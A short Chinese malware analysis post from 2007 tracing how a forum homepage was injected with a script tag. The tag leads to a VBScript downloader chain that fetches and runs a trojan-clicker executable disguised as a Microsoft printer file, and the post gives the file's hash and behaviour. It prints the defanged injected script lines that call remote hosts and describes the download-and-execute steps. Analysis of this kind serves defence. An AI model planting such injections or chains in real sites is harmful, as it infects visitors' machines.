endurer 原创
2007-02-01 第1版
论坛首页被加入代码:
/------<script language="javascript" src="hxxp://*61.146.118.1*1/news***/include*/m***d5.asp?ad*=1****"></script>------/
m***d5.asp?ad*=1**** 中发现代码:/------document.write("<script language=/"javascript/" src=/"hxxp://www.cnfish.com/editor/htmleditor/images/WINPNT.JS/"></script>");------/
WINPNT.JS 中发现JavaScript脚本程序,功能是输出一段VBScript脚本程序。该VBScript脚本程序的功能是调用自定义函数r(k)来解密用~分隔的数字字符串并执行,利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 从另一网站hxxp://www.c***nfi**sh**.com.**/下载文件WINPNT.VBS,保存为%temp%/WINPNT.VBS,利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
WINPNT.VBS 包含VBScript脚本程序,下载文件WINPNT.EXE,保存为%temp%/WINPNT.EXE,使用 Wscript.Sleep 让脚本暂停5 秒(5000 毫秒),再利用Wscript.Shell 对象Shell 的 run 方法 来运行。
WINPNT.EXE 采用 VB 编写,ASPack 2.12 -> Alexey Solodovnikov 加壳。/----文件说明符 : D:/test/WINPNT.EXE属性 : A---语言 : 中文(中国)文件版本 : 5.2600.2180说明 : Microsoft Internet Explorer版权 : C) Microsoft Corporation. All rights reserved.备注 : Microsoft Windows Printer产品版本 : 5.2600.2180产品名称 : Microsoft Windows Printer公司名称 : Microsoft Corporation合法商标 : 内部名称 : WINPNT源文件名 : WINPNT.EXE创建时间 : 2007-1-31 21:26:56修改时间 : 2007-1-31 21:26:58访问时间 : 2007-1-31 0:0:0大小 : 23552 字节 23.0 KBMD5 : 5c7ced24b750740ca747d943feb11c1c----/Kaspersky 报为:Trojan-clicker.Win32.VB.qq
这东东会在注册表run键下创建启动项内置了一批广告网址列表,随机弹出广告窗口似乎有在线升级或下载文件功能
